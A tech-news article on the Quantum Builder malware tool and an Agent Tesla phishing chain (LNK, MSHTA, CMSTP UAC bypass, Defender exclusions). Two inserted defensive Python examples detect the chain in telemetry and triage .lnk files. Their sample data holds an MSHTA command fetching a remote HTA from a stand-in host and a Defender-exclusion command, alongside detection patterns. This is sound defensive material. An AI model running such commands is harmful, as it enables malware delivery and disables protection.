A tool sold on the dark web that allows cybercriminals to create malicious shortcuts to distribute malware is being used in a campaign promoting a long-standing .NET keylogger and remote access Trojan (RAT) called Agent Tesla.
The customizable tool Quantum Builder (aka Quantum LNK Builder) was seen for sale on cybercriminal markets in June by security researchers at Cyware. Attackers can use Quantum Builder to create malicious Microsoft Windows LNK shortcut files.
The shortcuts let cybercriminals build and distribute malicious payloads using legitimate system tools such as PowerShell and Microsoft HTML Application (HTA) files.
In a report this week, researchers uncovered a campaign that uses Quantum Builder to deliver Agent Tesla, malware that has been around since 2014 and is used to steal sensitive information from a victim’s device, including user credentials, browser credentials, keystrokes, and clipboard data.
Quantum Builder has been linked to the Advanced Persistent Threat (APT) gang Lazarus Group on the basis of shared tactics, techniques and procedures (TTPs) and source code overlap, but the researchers cannot confidently attribute the current campaign to Lazarus or any specific threat group.
Malware as a Service is cheaper than you think
Quantum Builder, which Cyware says costs from about $200 for two months’ access to $950 for lifetime access, can generate LNK, HTA, and ISO payloads that include sophisticated download techniques, and deliver the final payload via a multi-stage attack chain.
This includes decrypting PowerShell scripts in memory with an HTA file and bypassing User Account Control (UAC) via Microsoft Connection Manager Profile Installer (CMSTP), a program that installs Connection Manager service profiles, in order to start Agent Tesla with administrator rights.
The UAC bypass is also used to add Windows Defender exclusions on the system.
Quantum Builder offers other detection-evasion and cloaking techniques, including the use of living-off-the-land binaries (LOLBins), which are legitimate Microsoft tools. It “also includes techniques such as decoys, UAC prompts, and in-memory PowerShell to run the final payload,” the researchers noted, adding that “these techniques are regularly updated by the Quantum Builder developers.”
The chain of infection begins with a spearphishing email whose subject line poses as an order confirmation from GuangDong Nanz Technology, a Chinese manufacturing company. The email contains the LNK file bundled in a GZIP archive which, once opened by the victim, runs the embedded PowerShell code that launches MSHTA, which in turn executes an HTA file hosted on a remote server.
“The HTA file then decrypts a PowerShell load script, which decrypts and loads another PowerShell script after performing an AES decryption and GZIP decompression,” they wrote. “The decrypted PowerShell script is the Downloader PS script, which first downloads the Agent Tesla binary from a remote server and then runs it with administrative privileges by performing a UAC bypass using the CMSTP.”
Agent Tesla is then run on the victim’s computer with administrator privileges.
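As an added illustration of the chain described above (not code from the article or from the researchers' report), the following Python walks constructed process-creation records in the shape of EDR or Sysmon telemetry and flags the three behaviours the campaign relies on: PowerShell launching MSHTA against a remote HTA, cmstp.exe spawning a child process, and a command line that adds Windows Defender exclusions. All PIDs, paths, the example.invalid URL and the angle-bracket placeholders in the command lines are constructed for the example.

```python
"""Process-telemetry detection for the PowerShell -> MSHTA -> CMSTP chain.
Added example: the events below are constructed in the shape of EDR/Sysmon
process-creation records; nothing here is taken from the researchers' report."""
import re
from pathlib import PureWindowsPath

SAMPLE_EVENTS = [  # constructed sample telemetry: pid, parent pid, image, command line
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command <launcher decoded from the LNK, placeholder>"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": "cmstp.exe <profile inf path, placeholder>"},
    {"pid": 500, "ppid": 400, "image": r"C:\Users\victim\AppData\Roaming\svc.exe",
     "cmdline": "svc.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\victim\AppData\Roaming"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

SHELLS = ("powershell.exe", "pwsh.exe")


def _basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Return (pid, reason) pairs for events that match a stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = _basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = _basename(parent["image"]) if parent else ""
        cmdline = e["cmdline"].lower()
        # Stage 1: MSHTA fetching an HTA from a remote server, spawned by PowerShell
        if image == "mshta.exe" and re.search(r"https?://", cmdline):
            findings.append((e["pid"], "mshta.exe launched with a remote URL"))
        if image == "mshta.exe" and parent_image in SHELLS:
            findings.append((e["pid"], "PowerShell spawned mshta.exe"))
        # Stage 2: cmstp.exe installs connection profiles and should not spawn
        # children; a child here is the UAC-bypass pattern that starts the payload
        if parent_image == "cmstp.exe":
            findings.append((e["pid"], "child process of cmstp.exe"))
        # Stage 3: Defender exclusions added from a command line
        if "add-mppreference" in cmdline and "exclusion" in cmdline:
            findings.append((e["pid"], "Defender exclusion added via Add-MpPreference"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The parent-child rules are the robust part: the URL and the cmdlet name can be obfuscated, but a child of cmstp.exe or an mshta.exe whose parent is a PowerShell host is visible in any telemetry that records parent PIDs.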
ThreatLabz analysts found multiple samples using different infection chains to deliver Agent Tesla, with the LNK file bundled in a ZIP archive. In that case the LNK file also runs the HTA file hosted on the remote server: it decodes its command by converting the integers in the command to characters and replacing spaces, then uses MSHTA to run the HTA file from a remote URL.
In their June report, the Cyware team said attackers find LNK extensions advantageous. By default, Windows hides the .lnk extension, so if a file is named with a double extension such as .txt.lnk, the user sees only the file name ending in .txt. Because of this, they wrote, there is a high likelihood of tricking users into clicking on this type of file.
In addition, “when the LNK files are executed, they can execute PowerShell code that can be used for further actions,” the Cyware researchers wrote. “In this particular case, it runs an HTML application file hosted on Quantum’s website and uses a legitimate Windows utility used to run HTA files, MSHTA.”
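The hidden-extension trick and the LNK-to-MSHTA launch described above can be checked at the file level before anything runs. The following Python is an added example, not code from the article or from Cyware's or ThreatLabz's research: it parses a shortcut according to the MS-SHLLINK layout (header, optional IDList and LinkInfo, then the StringData fields), recovers the target path and command-line arguments, and flags a double extension, a LOLBin target, or a remote URL in the arguments. The build_sample_lnk helper only constructs a minimal fixture so the parser can run offline; the file name, target path and example.invalid URL it uses are constructed.

```python
"""Shortcut triage (added example): parse a Windows .lnk per the MS-SHLLINK
layout, recover target path and arguments, and flag the tricks described above."""
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_DATA_ORDER = (  # StringData blocks always appear in this fixed order
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
LOLBINS = ("mshta", "powershell", "pwsh", "cmstp", "wscript", "cscript", "rundll32")


def _parse_link_info(data: bytes, off: int) -> tuple[int, str]:
    """Return (LinkInfoSize, LocalBasePath) for the LinkInfo block at `off`."""
    size, _hdr_size, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, off)
    local_base = ""
    if li_flags & 0x01:  # VolumeIDAndLocalBasePath: a NUL-terminated ANSI path is present
        start = off + base_off
        local_base = data[start:data.index(b"\x00", start)].decode("cp1252")
    return size, local_base


def parse_lnk(data: bytes) -> dict:
    """Validate the header, skip the IDList, read LinkInfo and the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    link = {"flags": flags, "local_base_path": ""}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) followed by the item list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        size, link["local_base_path"] = _parse_link_info(data, off)
        off += size
    unicode = bool(flags & IS_UNICODE)
    for flag, name in STRING_DATA_ORDER:  # each block: CountCharacters then the string
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            nbytes = count * 2 if unicode else count
            raw = data[off:off + nbytes]
            off += nbytes
            link[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return link


def triage(filename: str, data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    parts = filename.lower().split(".")
    if parts[-1] == "lnk" and len(parts) > 2:
        findings.append(f"double extension: '.{parts[-2]}' shown, '.lnk' hidden by Explorer")
    link = parse_lnk(data)
    cmdline = f"{link['local_base_path']} {link.get('arguments', '')}".lower()
    for lol in LOLBINS:
        if lol in cmdline:
            findings.append(f"target runs LOLBin {lol}")
    if re.search(r"https?://", cmdline):
        findings.append("arguments reference a remote URL")
    return findings


def build_sample_lnk(local_base_path: str, arguments: str) -> bytes:
    """Constructed test fixture: minimal header + LinkInfo + Unicode arguments."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # FILE_ATTRIBUTE_ARCHIVE, SW_SHOWNORMAL
    path = local_base_path.encode("cp1252") + b"\x00"
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    base_off = 0x1C + len(volume_id)
    suffix_off = base_off + len(path)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x01, 0x1C,
                            base_off, 0, suffix_off) + volume_id + path + b"\x00"
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + link_info + args


if __name__ == "__main__":
    sample = build_sample_lnk(r"C:\Windows\System32\mshta.exe", "https://example.invalid/lure.hta")
    for line in triage("order_confirmation.txt.lnk", sample):
        print("-", line)
```

Real shortcuts usually also carry a LinkTargetIDList and ExtraData blocks; the parser skips the former by its size field and ignores anything after the StringData, so it still reads the target and arguments from ordinary files.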
Quantum Builder has been used by threat groups in several campaigns to deliver a range of malware families, including RedLine Stealer (which, like Agent Tesla, steals login credentials as well as credit card information and other data), IcedID (a banking trojan), GuLoader (an advanced downloader), Remcos RAT, and AsyncRAT.
“Threat actors are constantly evolving their tactics and using malware builders sold on the cybercrime marketplace,” they wrote. “This Agent Tesla campaign is the latest in a series of attacks that have used Quantum Builder to create malicious payloads in campaigns against various organizations.”
The campaign “incorporates sophisticated techniques to avoid detection, and the techniques will be updated regularly by the developers,” they added. ®
https://www.theregister.com/2022/09/28/quantum_builder_agent_tesla_rat/ Quantum Builder tool helps criminals distribute Windows RATs • The Register